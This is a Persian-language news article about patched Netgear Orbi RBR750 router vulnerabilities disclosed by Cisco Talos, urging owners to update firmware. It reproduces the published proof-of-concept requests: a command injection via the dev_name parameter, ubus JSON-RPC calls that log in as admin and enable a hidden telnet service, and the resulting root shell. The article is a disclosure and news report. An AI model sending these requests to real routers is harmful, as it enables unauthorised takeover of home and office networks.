اگر روتر Netgear Orbi شما وصله نشده است، باید آن را تغییر دهید

بزرگنمایی کنید / روتر سری Orbi 750.

Netgear

اگر برای اتصال به اینترنت به سیستم بی‌سیم مش Orbi Netgear تکیه می‌کنید، اکنون که کد بهره‌برداری برای آسیب‌پذیری‌های مهم در نسخه‌های قدیمی‌تر منتشر شده است، باید مطمئن شوید که آخرین سیستم‌افزار را اجرا می‌کند.

سیستم بی سیم مش Netgear Orbi شامل یک روتر هاب اصلی و یک یا چند روتر ماهواره ای است که برد شبکه را افزایش می دهد. با راه اندازی چندین اکسس پوینت در یک خانه یا محل کار، آنها یک سیستم مش را تشکیل می دهند که تضمین می کند پوشش Wi-Fi در سراسر جهان در دسترس است.

تزریق دستورات دلخواه از راه دور

سال گذشته، محققان تیم امنیتی Talos سیسکو چهار آسیب پذیری را کشف کردند و به طور خصوصی آنها را به Netgear گزارش کردند. شدیدترین آسیب پذیری که با نام CVE-2022-37337 ردیابی می شود، در عملکرد کنترل دسترسی RBR750 قرار دارد. هکرها می‌توانند از آن برای اجرای دستورات از راه دور با ارسال درخواست‌های HTTP ساخته‌شده ویژه به دستگاه سوء استفاده کنند. هکر ابتدا باید با دانستن رمز SSID یا با دسترسی به یک SSID محافظت نشده به دستگاه متصل شود. شدت نقص 9.1 از 10 ممکن است.

در ژانویه، Netgear به‌روزرسانی‌های سفت‌افزاری را منتشر کرد که این آسیب‌پذیری را اصلاح کرد. در حال حاضر، Talos یک کد سوء استفاده اثبات مفهوم به همراه جزئیات فنی منتشر کرده است.

محققان Talos نوشتند: “عملکرد کنترل دسترسی Orbi RBR750 به کاربر اجازه می دهد تا به طور صریح دستگاه هایی را اضافه کند (مشخص شده توسط آدرس MAC و نام میزبان) تا هنگام تلاش برای دسترسی به شبکه، دستگاه مشخص شده را مجاز یا مسدود کند.” “با این حال، پارامتر dev_name در برابر تزریق فرمان آسیب پذیر است.”

کد اکسپلویت منتشر شده به شرح زیر است:

POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
Host: 10.0.0.1
Content-Length: 104
Authorization: Basic YWRtaW46UGFzc3cwcmQ=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
Connection: close

action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list

دستگاه با موارد زیر پاسخ می دهد:

   [email protected]:/tmp# ps | grep ping
   21763 root  	1336 S	ping 10.0.0.4

دو آسیب‌پذیری دیگر که Talos کشف کرد نیز در ژانویه وصله‌هایی دریافت کردند. CVE-2022-36429 همچنین یک نقص اجرای فرمان از راه دور است که می تواند با ارسال دنباله ای از بسته های مخرب که یک شی JSON ساخته شده ویژه ایجاد می کند، مورد سوء استفاده قرار گیرد. درجه شدت آن 7.2 است.

این اکسپلویت با استفاده از مجموع رمز عبور SHA256 با نام کاربری «admin» برای بازگرداندن یک کوکی احراز هویت مورد نیاز برای شروع یک جلسه تلنت غیرمستند آغاز می‌شود:

POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 217
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"","timeout":900}],"jsonrpc":"2.0","id":3}

سپس توکن “ubus_rpc_session” مورد نیاز برای راه اندازی سرویس مخفی telnet ظاهر می شود:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 829
Connection: close
Date: Mon, 11 Jul 2022 19:27:03 GMT
Server: lighttpd/1.4.45

{"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}

سپس دشمن پارامتری به نام ‘telnet_enable’ را برای راه اندازی سرویس telnet اضافه می کند:

POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 138
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/status.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}

همان رمز عبوری که برای تولید هش SHA256 با نام کاربری «admin» استفاده می‌شود، به مهاجم اجازه می‌دهد تا وارد سرویس شود:

$ telnet 10.0.0.4
Trying 10.0.0.4...
Connected to 10.0.0.4.
Escape character is '^]'.

login: admin
Password: === IMPORTANT ============================
 Use 'passwd' to set your login password
 this will disable telnet and enable SSH
------------------------------------------


BusyBox v1.30.1 () built-in shell (ash)

 	MM       	NM                	MMMMMMM      	M   	M
   $MMMMM    	MMMMM            	MMMMMMMMMMM  	MMM 	MMM
  MMMMMMMM 	MM MMMMM.          	MMMMM:MMMMMM:   MMMM   MMMMM
MMMM= MMMMMM  MMM   MMMM   	MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
MMMM=  MMMMM MMMM	MM   	MMMMM	MMMM	MMMM   MMMMNMMMMM
MMMM=   MMMM  MMMMM      	MMMMM 	MMMM	MMMM   MMMMMMMM
MMMM=   MMMM   MMMMMM   	MMMMM  	MMMM	MMMM   MMMMMMMMM
MMMM=   MMMM 	MMMMM,	NMMMMMMMM   MMMM	MMMM   MMMMMMMMMMM
MMMM=   MMMM  	MMMMMM   MMMMMMMM	MMMM	MMMM   MMMM  MMMMMM
MMMM=   MMMM   MM	MMMM	MMMM  	MMMM	MMMM   MMMM	MMMM
MMMM$ ,MMMMM  MMMMM  MMMM	MMM   	MMMM   MMMMM   MMMM	MMMM
  MMMMMMM:  	MMMMMMM 	M     	MMMMMMMMMMMM  MMMMMMM MMMMMMM
	MMMMMM   	MMMMN 	M       	MMMMMMMMM  	MMMM	MMMM
 	MMMM      	M                	MMMMMMM    	M   	M
   	M
 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
 ---------------------------------------------------------------
[email protected]:/#

آسیب‌پذیری وصله‌شده دیگر CVE-2022-38458 با درجه‌بندی شدت 6.5 است. این از دستگاهی ناشی می شود که از کاربران می خواهد رمز عبور را از طریق اتصال HTTP وارد کنند که رمزگذاری نشده است. سپس یک دشمن در همان شبکه می تواند رمز عبور را کشف کند.